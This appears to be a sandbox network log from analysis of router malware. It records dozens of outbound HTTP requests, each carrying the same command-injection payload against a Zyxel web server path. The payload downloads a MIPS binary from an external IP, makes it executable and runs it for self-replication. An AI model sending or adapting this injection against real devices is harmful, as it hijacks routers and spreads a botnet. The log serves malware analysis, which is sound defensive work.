                                                      Feb 2, 2024 06:36:08.984827042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8384192.168.2.143772076.165.255.87443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.984848976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8385192.168.2.1458772142.223.16.106443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.984908104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8386192.168.2.1449890199.73.73.176443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.984945059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8387192.168.2.1447398166.77.32.226443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.984971046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8388192.168.2.1451640201.216.183.163443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.985023975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8389192.168.2.144940627.49.78.92443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.985047102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8390192.168.2.145717274.188.65.213443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.985083103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8391192.168.2.1452188192.144.28.175443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.985120058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8392192.168.2.1440636111.254.30.118443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.985203028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8393192.168.2.1452106106.176.124.2443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.985239983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8394192.168.2.1441388187.169.189.183443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.985285044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8395192.168.2.145446885.90.192.116443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.985316992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8396192.168.2.145352038.182.10.114443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.985363960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8397192.168.2.1449956117.104.220.35443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.985411882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8398192.168.2.1448962154.241.166.212443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.985457897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8399192.168.2.1451834169.181.108.11443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.985490084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8400192.168.2.144476417.231.74.45443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.985522985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8401192.168.2.1440246190.33.141.49443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.985572100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8402192.168.2.144445413.54.167.134443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.985593081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8403192.168.2.1456410206.222.248.58443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.985642910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8404192.168.2.1443646178.83.68.160443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.985682011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8405192.168.2.1444774180.51.134.229443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.985727072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8406192.168.2.1439284189.25.189.166443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.985764980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8407192.168.2.1434812123.104.43.218443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.985810995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8408192.168.2.145878060.25.44.51443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.985862970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8409192.168.2.144443052.236.24.122443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.985918045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8410192.168.2.1441928162.152.169.91443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.985938072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8411192.168.2.144488668.66.155.205443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.985975981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8412192.168.2.1458222147.16.8.122443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.986031055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8413192.168.2.1454610105.225.49.63443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.986053944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8414192.168.2.1457574125.223.253.48443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.986102104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8415192.168.2.1436704192.27.249.65443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.986124039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8416192.168.2.1450124190.33.215.53443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.986156940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8417192.168.2.144931067.22.184.71443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.986216068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8418192.168.2.1448100159.98.75.17443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.986248970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8419192.168.2.1452506178.100.252.161443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.986294985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8420192.168.2.1455168217.132.215.209443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.986330986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8421192.168.2.1438924181.200.17.154443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.986373901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8422192.168.2.1454786169.136.218.7443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.986411095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8423192.168.2.144112460.134.149.216443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.986452103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8424192.168.2.1456354211.147.136.12443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.986488104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8425192.168.2.1451024186.22.59.129443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.986515045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8426192.168.2.144660273.109.117.205443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.986577034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8427192.168.2.144472017.46.6.224443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.986612082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8428192.168.2.144729080.124.1.102443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.986646891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8429192.168.2.1434334133.241.200.97443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.986674070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8430192.168.2.1447746116.126.24.237443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.986711025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8431192.168.2.143654225.125.87.14443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.986737967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8432192.168.2.144418861.119.185.19443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.986803055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8433192.168.2.1449136220.143.43.33443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.986844063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8434192.168.2.145081650.219.121.38443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.986884117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8435192.168.2.1446362149.40.239.227443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.986938000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8436192.168.2.1447738149.174.144.223443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:08.986963034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8437192.168.2.1437016128.147.166.14443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:09.998047113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8438192.168.2.1435288176.153.7.69443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:09.998092890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8439192.168.2.143590687.90.154.160443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:09.998126030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8440192.168.2.1443636132.231.29.36443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:09.998156071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8441192.168.2.144845094.70.80.133443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:09.998176098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8442192.168.2.145999698.30.214.162443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:09.998230934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8443192.168.2.1442768111.124.193.149443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:09.998275042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8444192.168.2.1443730219.0.119.144443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:09.998305082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8445192.168.2.1448972220.29.37.112443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:09.998349905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8446192.168.2.1457860155.193.93.36443
                                                      TimestampBytes transferredDirectionData
